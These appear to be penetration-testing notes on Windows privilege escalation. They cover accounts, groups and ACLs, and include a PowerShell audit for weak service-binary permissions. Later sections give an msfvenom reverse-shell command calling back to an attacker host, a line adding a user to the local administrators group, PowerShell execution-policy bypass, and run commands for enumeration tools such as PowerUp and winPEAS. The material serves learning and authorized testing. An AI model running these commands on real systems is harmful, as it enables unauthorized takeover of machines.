| description |
|---|
| Goal: low priv -> Administrator or SYSTEM |
Our ultimate goal with privilege escalation in Windows is to gain a shell running as an Administrator or SYSTEM user.
Privilege escalation can be simple, or it can require complete enumeration of the compromised system.
In many cases it requires several misconfigurations chained together before a working exploit path exists.
All privilege escalations are effectively examples of access control violations.
Understanding how Windows handles permissions is paramount.
User accounts are used to log into a Windows system.
The local Administrator account is created by default.
Several other user accounts may exist such as Guest, krbtgt, etc.
Service accounts are used to run services in Windows.
Service accounts cannot be used to sign into a Windows system.
The SYSTEM account is a default service account which has the highest privileges of any local account in Windows.
Other service accounts include NETWORK SERVICE and LOCAL SERVICE.
User accounts can belong to multiple groups and groups can have multiple users.
Groups allow for easier access control to resources.
Regular groups have a set list of members.
Pseudo groups, such as "Authenticated Users", have a dynamic membership that changes based on how a principal interacts with the system (for example, by authenticating).
In Windows, there are multiple types of resource, also known as objects.
These include:
- Files/Directories
- Registry Entries
- Services
Whether a user or group is permitted to perform a certain action on a resource depends on that resource's access control list (ACL); every access decision for a resource is made against its ACL.
Each ACL is made up of zero or more access control entries (ACEs).
Each ACE defines the relationship between a principal and a certain access right.
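As an added example (not part of the original notes), the following PowerShell audit applies the ACL/ACE model above to service binaries: it walks each service's image file and parent directory and reports Allow ACEs that give broad principals write-class rights, which is the class of misconfiguration that tools like PowerUp and SharpUp report. The principal list and the rights mask are this example's own choices.

```powershell
# Added audit example (not from the original page): report Allow ACEs on service
# binaries (and their directories) that grant write-class rights to broad principals.
$WriteMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, TakeOwnership, ChangePermissions'

# Principals that every (or nearly every) logged-on user belongs to.
$BroadPrincipals = @('Everyone', 'NT AUTHORITY\Authenticated Users', 'BUILTIN\Users', 'NT AUTHORITY\INTERACTIVE')

function Get-ServiceImagePath {
    # Extract the executable path from a Win32_Service PathName (quoted or not, with or without arguments).
    param([Parameter(Mandatory)][string]$PathName)
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    # Unquoted path: it may itself contain spaces, so try the longest prefix first.
    $tokens = $PathName -split ' '
    for ($i = $tokens.Count; $i -gt 0; $i--) {
        $candidate = $tokens[0..($i - 1)] -join ' '
        if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
    }
    return $null
}

function Get-WeakFileAce {
    # Return each Allow ACE on $Path whose principal is broad and whose rights include writing.
    param([Parameter(Mandatory)][string]$Path)
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $WriteMask) -eq 0) { continue }
        [pscustomobject]@{
            Path      = $Path
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
            Inherited = $ace.IsInherited
        }
    }
}

function Get-WeakServiceBinaryAce {
    # Audit the image file and its parent directory for every service
    # (a writable parent directory is as much of a finding as a writable binary).
    foreach ($svc in Get-CimInstance Win32_Service) {
        if (-not $svc.PathName) { continue }
        $image = Get-ServiceImagePath -PathName $svc.PathName
        if (-not $image) { continue }
        foreach ($target in @($image, (Split-Path -Parent $image))) {
            Get-WeakFileAce -Path $target |
                Add-Member -NotePropertyName Service -NotePropertyValue $svc.Name -PassThru
        }
    }
}

Get-WeakServiceBinaryAce | Format-Table Service, Path, Principal, Rights, Inherited -AutoSize
```

Inherited ACEs point at the directory where the weak entry was set, so fixing the parent usually clears several findings at once.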
If we can execute commands with admin privileges, a reverse shell generated by msfvenom works best.
Syntax:
```shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.11 LPORT=53 -f exe -o reverse.exe
```
- Transfer the reverse shell to the compromised host; the connection can then be caught with netcat or Metasploit's Meterpreter handler.
Alternatively, if RDP is available (or if we enable it), we can add our low-privileged user to the administrators group and then spawn an administrator command prompt via the GUI.
Syntax:
```shell
net localgroup administrators <username> /add
```
To escalate from an admin user to full SYSTEM privileges, you can use the PsExec tool.
PowerUp and SharpUp are very similar tools that look for specific misconfigurations that can grant an attacker privilege escalation.
How-To:
```powershell
powershell -exec bypass
. .\PowerUp.ps1
Invoke-AllChecks
```
{% embed url="https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1" %}
How-To:
```shell
.\SharpUp.exe
```
{% embed url="https://github.com/GhostPack/SharpUp" %}
Seatbelt is an enumeration tool. It runs a set of host checks but does not itself hunt for exploitable misconfigurations; it simply aids investigation and enumeration.
How-To:
```shell
.\Seatbelt.exe
.\Seatbelt.exe NonstandardServices
.\Seatbelt.exe All
```
{% embed url="https://github.com/GhostPack/Seatbelt" %}
How-To:
```shell
.\winPEASany.exe -h
.\winPEASany.exe userinfo
```
{% embed url="https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS" %}